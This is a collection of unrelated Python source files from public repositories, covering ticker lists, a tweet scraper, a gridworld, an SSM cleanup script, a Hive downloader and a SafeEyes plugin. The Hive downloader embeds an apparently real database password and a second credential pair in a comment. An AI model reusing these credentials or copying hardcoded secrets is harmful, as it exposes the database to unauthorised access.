\"WMT\",\n \"MRVL\", \"VNQ\", \"BABA\", \"ADMP\", \"TRQ\", \"FSM\", \"DBD\", \"SPWR\", \"GERN\", \"CRNT\",\n \"CS\", \"V\", \"TGT\", \"CAG\", \"RESI\", \"GNW\", \"ACB\", 
\"ARCC\", \"XLK\", \"EQT\", \"DAL\",\n \"GORO\", \"HST\", \"ORCL\", \"XBI\", \"AMRS\", \"GDXJ\", \"XLI\", \"MGM\", \"GEL\", \"NVDA\",\n \"PG\", \"CY\", \"JNJ\", \"GNC\", \"AMAT\", \"USAT\", \"AVEO\", \"DXC\", \"XOM\", \"PDD\",\n \"MTG\", \"SMH\", \"TXMD\", \"IMMR\", \"MRO\", \"IBM\", \"WATT\", \"CLDR\", \"BBBY\",\n \"NBR\", \"BRFS\", \"TROX\", \"NE\", \"CNQ\", \"TSM\", \"PEG\", \"BTI\", \"MET\", \"EWJ\",\n \"CYH\", \"FEYE\", \"CNX\", \"KGC\", \"SFUN\", \"PSO\", \"XRT\", \"AEZS\", \"IEF\", \"STM\",\n \"NUGT\", \"BP\", \"VSTM\", \"CX\",\n}\n\ndefault_faves = {\n # liquid etfs\n \"SPY\", \"QQQ\", \"IWM\", \"VXX\", \"TLT\", \"IBB\", \"EEM\", \"XLF\", \"GDX\", \"XOP\", \"SLV\",\n # big techies\n \"AAPL\", \"AMZN\", \"FB\", \"NFLX\", \"GOOGL\", \"MSFT\", \"ADBE\", \"ORCL\", \"CSCO\",\n # unicorns\n \"SPOT\", \"SNAP\", \"EB\", \"IRBT\", \"TSLA\", \"CHGG\", \"ROKU\", \"FITB\", \"GPRO\",\n # video games\n \"ATVI\", \"EA\", \"TTWO\",\n # semis\n \"AMD\", \"NVDA\", \"MU\", \"INTC\", \"QCOM\",\n # banks\n \"BAC\", \"WFC\", \"JPM\", \"C\", \"GS\", \"MS\",\n # retail\n \"GOOS\", \"WMT\", \"LULU\", \"RH\", \"FOSL\",\n # telecom\n \"T\", \"TMUS\", \"VZ\", \"S\", \"CMCSA\",\n # pot\n \"CGC\", \"TLRY\", \"NBEV\", \"NEPT\", \"ABBV\",\n # china\n \"TME\", \"JD\", \"BABA\", \"NIO\",\n # some grandpa stocks\n \"DE\", \"MCD\", \"DIS\", \"BA\", \"X\",\n # dividend candidates\n \"STZ\", \"STM\", \"CPB\", \"XOM\", \"PPL\", \"KO\", \"PEP\",\n # saas\n \"NOW\", \"FIVN\", \"TEAM\", \"TWLO\", \"CRM\", \"WDAY\", \"ZS\", \"FEYE\", \"VEEV\", \"OKTA\",\n # misc\n \"BJ\", \"XLNX\", \"MEET\",\n}\n\"\"\"list(str): List of liquid, optionable, and well-known tickers according\nto the author \"\"\"\n\n\n# SYMBOL LOADERS -----------------------------------------\ndef load_sp500_weights():\n \"\"\"\n Loads a list of the S&P500 components and their weight in the index.\n :return: table containing information about S&P500 components\n :type: pd.DataFrame\n \"\"\"\n cache_fn = \"sp500_weights.csv\"\n try:\n sp500_weights = pd.read_csv(cache_fn)\n except IOError:\n # \"spx_page.html\" is an html page manually saved from the source of\n # https://www.slickcharts.com/sp500\n with open(\"spx_page.html\") as fobj:\n soup = BeautifulSoup(fobj.read())\n\n columns = [th.text.strip() for th in soup.thead.find_all('th')]\n rows = [[td.text.strip() for td in tr.find_all(\"td\")]\n for tr in soup.tbody.find_all(\"tr\")]\n df = pd.DataFrame(rows, columns=columns)\n df.Change = df.Change.apply(lambda s: float(s.split(\" \")[0]))\n df.Price = df.Price.apply(lambda s: float(s.replace(\",\", \"\")))\n df.Weight = df.Weight.apply(float)\n df.to_csv(cache_fn)\n sp500_weights = df\n\n return sp500_weights\n\ndef load_tastyworks_screener(fn):\n \"\"\"\n loads a tastyworks screener exported as a CSV file, and returns the list\n of symbols in the screener.\n note that the exported files from tastyworks often need some doctoring\n tickers are added that have been long bought out or bankrupt\n and other tickers are for indices, which IEX won't have\n :param fn: CSV file path\n :return: list of str\n \"\"\"\n screener = pd.read_csv(fn)\n return list(screener.Symbol)","repo_name":"ktarrant/btscreener","sub_path":"btscreener/collector/tickers.py","file_name":"tickers.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"37460352492","text":"import json\nimport datetime\nimport argparse\nimport snscrape.modules.twitter as sntwitter\nfrom tqdm.auto import 
tqdm\n\nparser = argparse.ArgumentParser(\n    description='retrieve-tweets - thank you Elon')\nparser.add_argument('construction', type=str,\n                    help='zijt | bent')\nparser.add_argument('year', type=int, help='The year to scrape for')\n\nargs = parser.parse_args()\n\nYEAR = str(args.year)\n\nYEAR_SNIPPET = f\"since:{YEAR}-01-01 until:{YEAR}-12-31\"\nGIJ_BENT_QUERY = f\"(ge OR gij OR gy bent) OR \\\"bende gij\\\" -je -jij {YEAR_SNIPPET} lang:nl\"\nGIJ_ZIJT_QUERY = f\"(ge OR gij OR gy zijt) OR (ge OR gij OR gy zyt) OR (zijde ge OR zijde gij OR zijde gy) OR (zyde ge OR zyde gij OR zyde gy) OR (zedde ge OR zedde gij OR zedde gy) {YEAR_SNIPPET} -je -jij lang:nl\"\n\nOUTPUT_FILE = f\"output/{args.construction}_{YEAR}.jsonl\"\n\ndef date_to_string(date):\n    return date.strftime(\"%Y-%m-%d %H:%M:%S\")\n\ndef tweet_to_dict(tweet):\n    return {\n        \"url\": tweet.url,\n        \"date\": date_to_string(tweet.date),\n        \"content\": tweet.rawContent,\n        \"id\": tweet.id,\n        \"username\": tweet.user.username,\n        \"user_id\": tweet.user.id,\n        \"user_display_name\": tweet.user.displayname,\n        \"user_description\": tweet.user.rawDescription,\n        \"user_verified\": tweet.user.verified,\n        \"user_created\": date_to_string(tweet.user.created),\n        \"user_followers_count\": tweet.user.followersCount,\n        \"user_friends_count\": tweet.user.friendsCount,\n        \"user_tweet_count\": tweet.user.statusesCount,\n        \"user_favourites_count\": tweet.user.favouritesCount,\n        \"user_listed_count\": tweet.user.listedCount,\n        \"user_media_count\": tweet.user.mediaCount,\n        \"user_location\": tweet.user.location,\n        \"user_profile_image_url\": tweet.user.profileImageUrl,\n        \"reply_count\": tweet.replyCount,\n        \"retweet_count\": tweet.retweetCount,\n        \"like_count\": tweet.likeCount,\n        \"quote_count\": tweet.quoteCount,\n        \"source_label\": tweet.sourceLabel,\n        #\"links\": tweet.links,\n        \"mentioned_users_count\": len(tweet.mentionedUsers) if tweet.mentionedUsers is not None else 0,\n        \"coordinates\": (tweet.coordinates.latitude, tweet.coordinates.longitude) if tweet.coordinates is not None else None,\n        \"place\": (tweet.place.id, tweet.place.fullName, tweet.place.name) if tweet.place is not None else None,\n        \"hashtags\": tweet.hashtags\n    }\n\nQUERY = GIJ_BENT_QUERY if args.construction == \"bent\" else GIJ_ZIJT_QUERY\n\nwith open(OUTPUT_FILE, \"at\", encoding=\"UTF-8\") as writer:\n    for tweet in tqdm(sntwitter.TwitterSearchScraper(QUERY).get_items(), desc=YEAR):\n        tweet_dict = tweet_to_dict(tweet)\n        tweet_json = json.dumps(tweet_dict)\n        writer.write(f\"{tweet_json}\\n\")","repo_name":"AntheSevenants/gij-bent","sub_path":"1-retrieve-tweets.py","file_name":"1-retrieve-tweets.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"23770802611","text":"class TermPrinter:\n    @staticmethod\n    def print(any_term, with_sign=False, sign_space=1):\n        if type(any_term) in [float, int]:\n            if any_term == 0:\n                return \"\"\n            else:\n                return TermPrinter.get_printable_coefficient(any_term)\n\n        sign = \"\"\n        if with_sign:\n            if any_term.get_coefficient() < 0:\n                sign = (\" \" * sign_space) + \"-\" + (\" \" * sign_space)\n            elif any_term.get_coefficient() > 0:\n                sign = (\" \" * sign_space) + \"+\" + (\" \" * sign_space)\n\n        any_term = abs(any_term)  # the sign has already been added above\n\n        if hasattr(any_term, \"terms\"):\n            return sign + TermPrinter.__print_multiple_alpha_term(abs(any_term))\n
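        # duck-typed dispatch: multi-term objects are assumed to expose .terms and\n        # single terms .is_equal_zero (those classes are not defined in this file)\n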
        elif hasattr(any_term, \"is_equal_zero\"):\n            return sign + TermPrinter.__print_alpha_term(abs(any_term))\n        else:\n            raise ValueError(\"The any_term parameter must be an actionable value.\")\n\n    @staticmethod\n    def __print_alpha_term(term):\n        if term.get_coefficient() == 0:\n            return \"\"\n        elif term.get_exponent() == 0:\n            return term.get_printable_coefficient()\n        else:\n            if abs(term.get_coefficient()) == 1:\n                return term.get_alpha() + TermPrinter.get_printable_exponent(term.get_exponent())\n            else:\n                return (term.get_printable_coefficient()\n                        + term.get_alpha()\n                        + TermPrinter.get_printable_exponent(term.get_exponent()))\n\n    @staticmethod\n    def __print_multiple_alpha_term(multiple_term):\n        if multiple_term.get_coefficient() == 0:\n            return \"\"\n        else:\n            coefficient = multiple_term.get_coefficient()\n            alp_exp = \"\"\n            for term in multiple_term.seperated_terms:\n                term.set_coefficient(1)\n                obj = TermPrinter.__print_alpha_term(term)\n                if not obj.isnumeric():\n                    alp_exp += obj\n\n            if len(alp_exp) == 0:\n                return TermPrinter.get_printable_coefficient(coefficient)\n            else:\n                pr_coe = \"\"\n                if coefficient != 1:\n                    pr_coe = TermPrinter.get_printable_coefficient(coefficient)\n\n                return pr_coe + alp_exp\n\n    @staticmethod\n    def get_printable_coefficient(_coe):\n        return str(int(_coe)) if float(_coe).is_integer() else str(_coe)\n\n    @staticmethod\n    def get_printable_exponent(_exp, is_regular=True):\n        if _exp in [0, 1] and is_regular:\n            return \"\"\n\n        minus = \"⁻\"\n        if _exp == -1 and is_regular:\n            return minus\n\n        exponents = ['⁰', '¹', '²', '³', '⁴', '⁵', '⁶', '⁷', '⁸', '⁹']\n        abs_exponent = abs(_exp)\n        result = minus if _exp < 0 else \"\"\n\n        for i in str(abs_exponent):\n            result += exponents[int(i)]\n        return result\n","repo_name":"lightningcell/unknown-terms","sub_path":"printer.py","file_name":"printer.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"65"} +{"seq_id":"6699064622","text":"from mdp import *\nimport numpy as np\n\n\nclass IndicatorWorld(GridMDP):\n    def __init__(self, terminals, grid_size,cell_size , gamma=.9, stochastic = False):\n        self.grid_size = grid_size\n        self.cell_size = cell_size\n\n        grid, self.true_weight = self.build_random(self.grid_size, self.cell_size )\n        GridMDP.__init__(self, grid, terminals, init=(0, 0), gamma=gamma, stochastic = stochastic)\n\n    def get_feature_vector(self, s):\n        x = s[0]\n        y = s[1]\n        f = np.array([0.0] * (self.grid_size / self.cell_size) ** 2)\n        f[self.macro_cell(self.grid_size - 1 - y, x)] = 1\n        return f\n\n    def grid_from_w(self, w):\n        '''\n        get grid world with rewards given the weights to indicator features\n        '''\n        l = [[0.0] * self.grid_size for i in xrange(self.grid_size)]\n\n        for i in xrange(self.grid_size):\n            for j in xrange(self.grid_size):\n                l[i][j] = w[self.macro_cell(i, j)]\n        return l\n\n    def macro_cell(self, x, y):\n
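        # row-major index of the macro cell containing grid point (x, y);\n        # e.g. size=4, cells=2: (0,0)->0, (2,0)->1, (0,2)->2, (2,2)->3\n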
        size = self.grid_size\n        cells = self.cell_size\n        cells_per_row = (size / cells)\n        return x / cells + y / cells * cells_per_row\n\n    def w_from_grid(self, l):\n        w = np.array([0.0]*self.grid_size**2)\n        for i in xrange(self.grid_size):\n            for j in xrange(self.grid_size):\n                w[self.macro_cell(i, j)] = l[i][j]\n        return w\n\n    def build_random(self, size, cells):\n        '''\n        size is the size of the nxn grid (size = n)\n        cells is the number of grid points in one macro cell region; it should divide size exactly\n        '''\n        w = []\n        w_sum = 0\n        for i in xrange((size / cells) ** 2):\n            # if i < 32:\n            #     w[i] = -1\n\n            if random.uniform(0, 1) < 0.3: # with probability 0.3\n                if random.uniform(0, 1) < 0.6: # with probability 0.6\n                    w.append(-1)\n                else:\n                    w.append(random.uniform(0, 1))\n            else:\n                w.append(0)\n            w_sum += abs(w[-1])\n\n        if len(w) > 50:\n            for i in xrange(len(w)):\n                w[i] = w[i] / float(w_sum)\n\n        elif len(w) > 20:\n            w = [0] * (size / cells) ** 2\n            w[-1] = 1\n        else:\n            w[0] = 10\n            w[1] = 10\n            w[2] = -10\n            w[3] = 0\n\n        # if len(w) > 4:\n        #     print kk\n\n        return self.grid_from_w(w), np.array(w)","repo_name":"siddharthanpr/irl","sub_path":"aima-python/indicatorgridworld.py","file_name":"indicatorgridworld.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"65"} +{"seq_id":"33573213863","text":"\"\"\"\nMain Module\n\"\"\"\n\nimport graph\nfrom predicates import LessThan, Equals\n\n\nif __name__ == \"__main__\":\n    G = graph.Graph()\n    G.create_variable(\"Befristung\")\n    G.create_variable(\"Arbeitszeit\")\n\n    g_109 = G.create_goal(\"109\")\n    g_110 = G.create_goal(\"110\")\n\n    LT = LessThan(7)\n    EQ = Equals(3)\n    C = G.add_constraint(\"109\", \"Befristung\", [[LT, LT], [EQ]])\n    print(C)\n    bef = G.get_variable(\"Befristung\")\n    #bef.set_value(3)\n\n    a = G.get_variable(\"Blah\")\n    b = G.get_variable(\"Blah\")\n\n    c = G.get_goal(\"Ziel\")\n    d = G.get_goal(\"Ziel\")\n\n    most_relevant_variable = G.get_most_relevant_variable()\n    valid_goals = G.get_valid_goals()\n    print(most_relevant_variable)\n    for valid_goal in valid_goals:\n        print(valid_goal)","repo_name":"v1ctr/akinator-io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"40803979595","text":"import json\nfrom datetime import datetime\n\n\nclass Driver:\n    id: int = 0\n    driver_license_no: str = \"\"\n    driver_code: str = \"\"\n    co_driver_id: int = 0\n    trailer_no: str = \"\"\n    note: str = \"\"\n    enable_for_elds: bool = True\n    enable_for_elog: bool = False\n    allow_yard_move: bool = False\n    allow_personal_conveyance: bool = False\n    activated_datetime: datetime = datetime.now()\n    terminated_datetime: datetime = datetime.now()\n    date_created: datetime = datetime.now()\n    app_version: str = \"\"\n    status: int = 1\n    color: str = \"\"\n    device_version_id: int = 0\n    driver_license_issue_state_id: int = 0\n    terminal_id: int = None\n    vehicle_id: int = None\n    user_id: int = None\n    organization_id: int = None\n\n\n    def __init__(self, data=None):\n        if not data:\n            data = {}\n        self.deserialize(data)\n\n\n    def deserialize(self, data):\n        if not data:\n            data = {}\n        self.id = data.get(\"id\", self.id)\n        self.driver_license_no = data.get(\"driver_license_no\", self.driver_license_no)\n        self.driver_code = data.get(\"driver_code\", self.driver_code)\n        self.co_driver_id = data.get(\"co_driver_id\", self.co_driver_id)\n        self.trailer_no = data.get(\"trailer_no\", self.trailer_no)\n        self.note = data.get(\"note\", self.note)\n        self.enable_for_elds = data.get(\"enable_for_elds\", self.enable_for_elds)\n        self.enable_for_elog = data.get(\"enable_for_elog\", self.enable_for_elog)\n        self.allow_yard_move = data.get(\"allow_yard_move\", self.allow_yard_move)\n        self.allow_personal_conveyance = data.get(\"allow_personal_conveyance\", self.allow_personal_conveyance)\n        self.activated_datetime = data.get(\"activated_datetime\", 
self.activated_datetime)\n        self.terminated_datetime = data.get(\"terminated_datetime\", self.terminated_datetime)\n        self.date_created = data.get(\"date_created\", self.date_created)\n        self.app_version = data.get(\"app_version\", self.app_version)\n        self.status = data.get(\"status\", self.status)\n        self.color = data.get(\"color\", self.color)\n        self.device_version_id = data.get(\"device_version_id\", self.device_version_id)\n        self.driver_license_issue_state_id = data.get(\"driver_license_issue_state_id\",\n                                                      self.driver_license_issue_state_id)\n        self.terminal_id = data.get(\"terminal_id\", self.terminal_id)\n        self.vehicle_id = data.get(\"vehicle_id\", self.vehicle_id)\n        self.user_id = data.get(\"user_id\", self.user_id)\n        self.organization_id = data.get(\"organization_id\", self.organization_id)\n\n\n    def serialize(self):\n        _data = {}\n        for param, val in self.__dict__.items():\n            _data[param] = val\n        return _data\n\n\n    def to_json(self):\n        return json.dumps(self.serialize())\n","repo_name":"shohruh-abduakhatov-portfolio/logitab-py","sub_path":"executors/models/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"20439401848","text":"import boto3\nfrom prepare_params import prepare_params\n\nclient = boto3.client('ssm')\n\ndefined_params = prepare_params().keys()\n\n\nremote_params = client.describe_parameters(\n    ParameterFilters=[\n        {\n            \"Key\": \"Type\",\n            \"Values\": [\"SecureString\"]\n        }\n    ]\n)['Parameters']\n\nparams = []\n\nfor parameter in remote_params:\n    name = parameter['Name']\n    if name not in defined_params:\n        if name != '/core/mysql/user/master/password':\n            params.append(name)\n\nif(len(params) > 0):\n    response = client.delete_parameters(Names=params)\n    print(response)\nprint('Done cleaning secure params')\n","repo_name":"deweiliu/parameter-store","sub_path":"sdk-secure-parameters/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"20420926922","text":"import logging\nimport os\nimport dbus\nimport re\nimport gi\nfrom safeeyes.model import TrayAction\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\ntray_icon_path = None\n\n\ndef __active_players():\n    \"\"\"\n    List of all media players which are playing now.\n    \"\"\"\n    players = []\n    bus = dbus.SessionBus()\n\n    for service in bus.list_names():\n        if re.match('org.mpris.MediaPlayer2.', service):\n            player = bus.get_object(service, \"/org/mpris/MediaPlayer2\")\n            interface = dbus.Interface(player, 'org.freedesktop.DBus.Properties')\n            status = str(interface.Get('org.mpris.MediaPlayer2.Player', 'PlaybackStatus')).lower()\n            if status == \"playing\":\n                players.append(player)\n    return players\n\n\ndef __pause_players(players):\n    \"\"\"\n    Pause all playing media players using dbus.\n    \"\"\"\n    for player in players:\n        interface = dbus.Interface(player, dbus_interface='org.mpris.MediaPlayer2.Player')\n        interface.Pause()\n\n\ndef init(ctx, safeeyes_config, plugin_config):\n    \"\"\"\n    Initialize the screensaver plugin.\n    \"\"\"\n    global tray_icon_path\n    tray_icon_path = os.path.join(plugin_config['path'], \"resource/pause.png\")\n\n\ndef get_tray_action(break_obj):\n    \"\"\"\n    Return TrayAction only if there is a media player currently playing.\n    \"\"\"\n    players = __active_players()\n    if players:\n        return TrayAction.build(\"Pause media\",\n                                tray_icon_path,\n                                Gtk.STOCK_MEDIA_PAUSE,\n                                lambda: __pause_players(players))\n","repo_name":"slgobinath/SafeEyes","sub_path":"safeeyes/plugins/mediacontrol/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":1330,"dataset":"github-code","pt":"65"} +{"seq_id":"31569758352","text":"from pyhive import hive\nimport pandas as pd\n\n\n# from impala.dbapi import connect\n# from impala.util import as_pandas\n# import sasl\n\ndef download_data():\n    out_url = \"/home/data/temp/zzx/data/\"\n    conn = hive.Connection(host='192.168.0.150', port=10015, username='hive', password='xwbigdata2022',\n                           database='standard_db', auth='CUSTOM')\n    # conn = hive.Connection(host='192.168.0.150',port=10015,username='ai',password='ai123456',\n    #                        database='standard_db',auth='CUSTOM')\n    cursor = conn.cursor()\n    cursor.execute(\"SELECT DISTINCT city from standard_db.di_store_dedupe\")\n    city_list = cursor.fetchall()\n    city_df = pd.DataFrame(city_list, columns=[\"city\"])\n    cities = city_df[\"city\"].tolist()\n    print(city_list)\n    print(\"Download count:\", len(cities))\n
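    # one query and one CSV per city keeps each Hive result set small; note that\n    # cityname is spliced into the SQL string, so the city values must be trusted\n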
    for cityname in cities:\n        if cityname is None:\n            continue\n        print(\"Starting SQL execution\")\n        # cursor.execute(\n        #     \"select id,name,cname,namepath,citycode,appcode,channeltype_new,category1_new,category2_new,category3_new \"\n        #     \"from standard_db.di_store_dedupe where appcode <> '高德' and city=\" + \"'\" + cityname + \"'\")\n        cursor.execute(\n            \"select id,name,cname,namepath,citycode,appcode,channeltype_new,category1_new,category2_new,category3_new \"\n            \"from standard_db.di_store_dedupe where city=\" + \"'\" + cityname + \"'\")\n        print(\"Data fetched\")\n        data_list = cursor.fetchall()\n        df = pd.DataFrame(data_list, columns=[\"id\", \"name\", \"cname\", \"namepath\", \"citycode\", \"appcode\", \"channeltype_new\",\n                                              \"category1_new\",\n                                              \"category2_new\", \"category3_new\"]).set_index(\"id\")\n        # df = pd.DataFrame(list)\n        # print(df)\n        df.to_csv(out_url + cityname + \".csv\")\n        print(\"Finished writing\", cityname)\n    print(\"All data updated!\")\n    cursor.close()\n    conn.close()\n\n\nif __name__ == '__main__':\n    # prediction data\n    # cities = ['江门市', '新乡市', '河源市', '潮州市', '湛江市', '肇庆市', '开封市', '广州市', '安阳市', '茂名市', '南阳市', '焦作市',\n    #           '漯河市', '深圳市', '韶关市', '驻马店市', '商丘市', '汕头市', '许昌市', '揭阳市', '郑州市', '汕尾市', '惠州市', '平顶山市',\n    #           '清远市', '济源市', '洛阳市', '周口市', '云浮市', '珠海市', '三门峡市', '鹤壁市', '信阳市', '佛山市', '梅州市', '濮阳市',\n    #           '徐州市', '宿迁市', '无锡市', '盐城市', '泰州市', '齐齐哈尔市', '常州市', '黑河市', '大庆市', '镇江市', '扬州市', '鸡西市',\n    #           '苏州市', '七台河市', '大兴安岭地区', '南通市', '鹤岗市', '南京市', '牡丹江市', '佳木斯市', '绥化市', '伊春市', '淮安市',\n    #           '双鸭山市', '连云港市', '哈尔滨市', '随州市', '恩施土家族苗族自治州', '武汉市', '宜昌市', '杭州市', '黄冈市', '台州市',\n    #           '温州市', '咸宁市', '鄂州市', '荆门市', '襄阳市', '舟山市', '神农架林区', '宁波市', '丽水市', '黄石市', '孝感市', '十堰市',\n    #           '天门市', '荆州市', '仙桃市', '湖州市', '潜江市', '定安县', '本溪市', '辽阳市', '屯昌县', '朝阳市', '铁岭市', '锦州市',\n    #           '阜新市', '儋州市', '临高县', '白沙黎族自治县', '鞍山市', '文昌市', '海口市', '陵水黎族自治县', '保亭黎族苗族自治县',\n    #           '乐东黎族自治县', '琼海市', '葫芦岛市', '澄迈县', '万宁市', '五指山市', '三亚市', '丹东市', '抚顺市', '大连市', '益阳市',\n    #           '昌江黎族自治县', '沈阳市', '三沙市', '北京城区', '营口市', '东方市', '盘锦市', '琼中黎族苗族自治县', '景德镇市',\n    #           '黔南布依族苗族自治州', '中卫市', '南昌市', '石嘴山市', '贵阳市', '黔东南苗族侗族自治州', '九江市', '吴忠市', '六盘水市',\n    #           '黔西南布依族苗族自治州', '上饶市', '抚州市', '银川市', '新余市', '毕节市', '吉安市', '遵义市', '铜仁市', '安顺市', '宜春市',\n    #           '鹰潭市', '固原市', '萍乡市', '赣州市', '滨州市', '潍坊市', '聊城市', '济宁市', '济南市', '青岛市', '东营市', '威海市',\n    #           '枣庄市', '烟台市', '菏泽市', '泰安市', '临沂市', '淄博市', '德州市', '日照市', '乌兰察布市', '保山市', '呼伦贝尔市',\n    #           '鄂尔多斯市', '普洱市', '玉溪市', '临沧市', '三明市', '漳州市', '呼和浩特市', '曲靖市', '龙岩市', '迪庆藏族自治州', '通辽市',\n    #           '楚雄彝族自治州', '宁德市', '泉州市', 
'阿拉善盟', '大理白族自治州', '南平市', '文山壮族苗族自治州', '丽江市', '包头市',\n    #           '西双版纳傣族自治州', '乌海市', '昭通市', '怒江傈僳族自治州', '莆田市', '巴彦淖尔市', '厦门市', '德宏傣族景颇族自治州', '昆明市',\n    #           '红河哈尼族彝族自治州', '兴安盟', '福州市', '赤峰市', '锡林郭勒盟', '澳门', '黄山市', '淮北市', '六安市', '宣城市', '合肥市',\n    #           '铜陵市', '宿州市', '滁州市', '蚌埠市', '马鞍山市', '亳州市', '芜湖市', '阜阳市', '池州市', '安庆市', '淮南市', '沧州市',\n    #           '保定市', '衡水市', '邢台市', '廊坊市', '邯郸市', '承德市', '秦皇岛市', '张家口市', '唐山市', '石家庄市', '铜川市',\n    #           '榆林市', '渭南市', '延安市', '汉中市', '宝鸡市', '安康市', '西安市', '咸阳市', '商洛市', '玉树藏族自治州', '海东市',\n    #           '巴中市', '辽源市', '延边朝鲜族自治州', '四平市', '遂宁市', '凉山彝族自治州', '海西蒙古族藏族自治州', '绵阳市', '海北藏族自治州',\n    #           '泸州市', '白山市', '达州市', '眉山市', '阿坝藏族羌族自治州', '吉林市', '黄南藏族自治州', '内江市', '海南藏族自治州', '成都市',\n    #           '广安市', '自贡市', '通化市', '长春市', '白城市', '南充市', '乐山市', '德阳市', '资阳市', '甘孜藏族自治州', '攀枝花市',\n    #           '宜宾市', '松原市', '广元市', '雅安市', '果洛藏族自治州', '西宁市', '东莞市', '中山市', '湘潭市', '百色市', '玉林市',\n    #           '怀化市', '防城港市', '河池市', '梧州市', '岳阳市', '郴州市', '钦州市', '崇左市', '常德市', '株洲市', '北海市', '柳州市',\n    #           '桂林市', '张家界市', '娄底市', '永州市', '湘西土家族苗族自治州', '长沙市', '来宾市', '衡阳市', '邵阳市', '南宁市', '兰州市',\n    #           '甘南藏族自治州', '金昌市', '酒泉市', '张掖市', '白银市', '嘉峪关市', '武威市', '天水市', '庆阳市', '临夏回族自治州',\n    #           '陇南市', '平凉市', '定西市', '忻州市', '吕梁市', '阳泉市', '太原市', '长治市', '运城市', '临汾市', '晋城市', '晋中市',\n    #           '贵港市', '贺州市', '朔州市', '大同市', '上海城区', '日喀则市', '五家渠市', '昌吉回族自治州', '那曲市', '阿里地区',\n    #           '胡杨河市', '石河子市', '北屯市', '克拉玛依市', '克孜勒苏柯尔克孜自治州', '乌鲁木齐市', '山南市', '阿克苏地区',\n    #           '博尔塔拉蒙古自治州', '吐鲁番市', '哈密市', '阿拉尔市', '双河市', '可克达拉市', '林芝市', '铁门关市', '喀什地区', '塔城地区',\n    #           '天津城区', '伊犁哈萨克自治州', '拉萨市', '和田地区', '巴音郭楞蒙古自治州', '阿勒泰地区', '昆玉市', '图木舒克市', '昌都市',\n    #           '重庆郊县', '重庆城区', '香港', '阳江市', '金华市', '嘉兴市', '衢州市', '绍兴市']\n    download_data()\n","repo_name":"sdgweFGFDHAQ/pycharm_project","sub_path":"workplace/resources/readhive.py","file_name":"readhive.py","file_ext":"py","file_size_in_byte":8193,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"7168302839","text":"def convert(value):\n    raw_l = value['lightsense_mlx75305']\n\n    # MCP output code transform factor 0.065 mV/(uW/cm^2): MCP mux\n    value_voltage = raw_l * 0.0000625\n    # voltage divider factor 5/2 to calc input voltage: voltage divider circuit\n    value_voltage_divider = (value_voltage * 5.00) / 2.00\n\n    converted_value = (value_voltage_divider - 0.09234) / 0.007 #with gain 1, the factor is 7mA/(uW/cm^2)\n\n    converted_value_rounded = round(converted_value, 3)\n\n    value['lightsense_mlx75305'] = (converted_value_rounded, 'uW/cm^2')\n    # value['lightsense_mlx75305'] = (raw_l, 'raw')\n\n    return value\n","repo_name":"waggle-sensor/plugin_manager","sub_path":"plugins/status.plugin/plugin_bin/waggle/protocol/v5/utils/mlx75305.py","file_name":"mlx75305.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"18944364408","text":"import requests\nfrom requests import Response\nfrom requests.exceptions import JSONDecodeError\n\n\nclass AuthorizationError(Exception):\n    def __init__(self):\n        super().__init__()\n\n\ndef assert_response_is_ok(response: Response):\n    if response.status_code == 401:\n        raise AuthorizationError\n    if not response.ok:\n        code = response.status_code\n        reason = response.reason\n        url = response.url\n        raise requests.RequestException(f\"[{code} Error]: {reason} ({url})\")\n\n\ndef assert_response_is_json(response: Response):\n    headers = response.headers\n    if 'Content-Type' not in headers or 'application/json' not in headers['Content-Type']:\n        raise requests.RequestException(f\"[JSON Error]: The response did not reply in JSON format ({response.url})\")\n    try:\n        response.json()\n    except JSONDecodeError as e:\n        message = f\"Could not parse into JSON format {response.url}.\\n\"\n        message += f\"{response.text}\\n\"\n        raise Exception(f\"{message}\\n{e}\")\n\n\ndef assert_response_is_xapi_data(response: Response):\n    data = response.json()\n    if 'status' not in data:\n        message = f\"[XAPI Data Error]: Response data does not match XAPI's data standard ({response.url})\"\n        hint = \"[Hint]: Data must be a JSON with keys containing ['status', (optional) 'message', (optional) 'data']\"\n        raise requests.RequestException(f\"{message}\\n{hint}\")\n\n\ndef assert_success(response: Response):\n    assert_response_is_ok(response)\n    assert_response_is_json(response)\n
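    # usage sketch (hypothetical endpoint): assert_success(requests.get(\"https://example.com/api\"))\n    # raises AuthorizationError on 401 and an exception for any other failure or non-JSON body\n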
